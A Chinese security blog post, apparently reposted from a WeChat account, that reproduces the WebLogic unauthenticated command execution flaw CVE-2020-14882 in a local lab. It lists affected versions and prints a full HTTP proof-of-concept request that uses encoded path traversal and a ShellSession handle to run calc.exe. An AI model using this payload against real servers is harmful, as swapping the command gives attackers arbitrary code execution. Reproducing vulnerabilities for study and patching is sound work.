weblogic 未授权命令执行漏洞(CVE-2020-14882)复现

  • A+
所属分类:安全文章

影响版本:

Oracle Weblogic Server 10.3.6.0.0

Oracle Weblogic Server 12.1.3.0.0

Oracle Weblogic Server 12.2.1.3.0

Oracle Weblogic Server 12.2.1.4.0

Oracle Weblogic Server 14.1.1.0.0

漏洞环境:这里我们测试WebLogic12.2.1.4,java环境是jdk1.8.0_271,可以自行百度下载,也可以用我的。网盘地址:

链接:https://pan.baidu.com/s/15PLdVp4Y0s9CcwAkBG1lfQ

提取码:l4hx

weblogic 未授权命令执行漏洞(CVE-2020-14882)复现

java版本

weblogic 未授权命令执行漏洞(CVE-2020-14882)复现

用管理员权限运行

java -jar fmw_12.2.1.4.0_wls_lite_generic.jar

weblogic 未授权命令执行漏洞(CVE-2020-14882)复现

安装完后

http://127.0.0.1:7001/console,也可以http://你的内网ip:7001/console

我这里是http://192.168.1.114:7001/console,是一个登陆界面

weblogic 未授权命令执行漏洞(CVE-2020-14882)复现

payload如下:

  1. Poc

  2. GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22) HTTP/1.1

  3. Host: 192.168.56.1:7001

  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0

  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

  6. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

  7. Accept-Encoding: gzip, deflate

  8. Connection: close

  9. Cookie: ADMINCONSOLESESSION=oz9zj-pQ0RS3h_Z2ZZ-HPUvS8f4Bal_ykFA3pcg_vJLBgwBP2bP1!2145697388; wp-settings-time-1=1601959792; JSESSIONID=iedzd4-y34Xmgc9Ws4JP8NiWdbUDmrt3BbDSY9MKX1hOmVaP6JYC!2145697388

  10. Upgrade-Insecure-Requests: 1

我们直接上hackbar。

weblogic 未授权命令执行漏洞(CVE-2020-14882)复现

是一个get请求的payload加上cookie即可,点执行后。一直在打开计算器!

weblogic 未授权命令执行漏洞(CVE-2020-14882)复现

最后成功复现!妈的,花了我整整一个下午的时间。

我当时的反应是

weblogic 未授权命令执行漏洞(CVE-2020-14882)复现


weblogic

 


WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

WebLogic是美商Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Java(J2EE)应用服务器软件(application server)之一,是世界上第一个成功商业化的J2EE应用服务器, 已推出到12c(12.2.1.4) 版。而此产品也延伸出WebLogic Portal,WebLogic Integration等企业用的中间件(但当下Oracle主要以Fusion Middleware融合中间件来取代这些WebLogic Server之外的企业包),以及OEPE(Oracle Enterprise Pack for Eclipse)开发工具。

本文始发于微信公众号(bgbing安全):weblogic 未授权命令执行漏洞(CVE-2020-14882)复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: